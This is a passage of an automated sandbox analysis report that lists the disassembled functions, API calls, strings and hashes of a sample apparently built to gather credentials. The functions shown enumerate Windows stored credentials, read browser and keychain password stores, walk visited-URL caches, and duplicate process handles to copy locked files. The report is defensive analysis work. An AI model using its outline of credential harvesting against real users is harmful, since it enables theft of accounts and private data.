43af7d 40035 423426 11 API calls 39893->40035 40080 43a76c 21 API calls 39897->40080 39898 43b529 40081 44081d 163 API calls 39898->40081 39899 43b462 40075 423330 11 API calls 39899->40075 39900 43af94 40036 423330 11 API calls 39900->40036 39904 43b47e 39909 43b497 39904->39909 40076 42374a memcpy memset memcpy memcpy memcpy 39904->40076 39905 43b544 39910 43b55c 39905->39910 40082 42c02e memset 39905->40082 39906 43b428 39906->39899 40074 432b60 16 API calls 39906->40074 39907 43afca 40037 423330 11 API calls 39907->40037 40077 4233ae 11 API calls 39909->40077 40083 43a87a 163 API calls 39910->40083 39911 43afdb 40038 4233ae 11 API calls 39911->40038 39917 43b56c 39920 43b58a 39917->39920 40084 423330 11 API calls 39917->40084 39918 43b4b1 40078 423399 11 API calls 39918->40078 39919 43afee 40039 44081d 163 API calls 39919->40039 40085 

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 708747863-3398334509
                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • free.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2263259095-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 4165125987-2783969131
                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                              Control-flow Graph (image; legend: Executed / Not Executed)
                                                              APIs
                                                              • memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                              Control-flow Graph (image; legend: Executed / Not Executed)
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • free.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 4234240956-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                              Control-flow Graph (image; legend: Executed / Not Executed)
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                              Control-flow Graph (image; legend: Executed / Not Executed)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

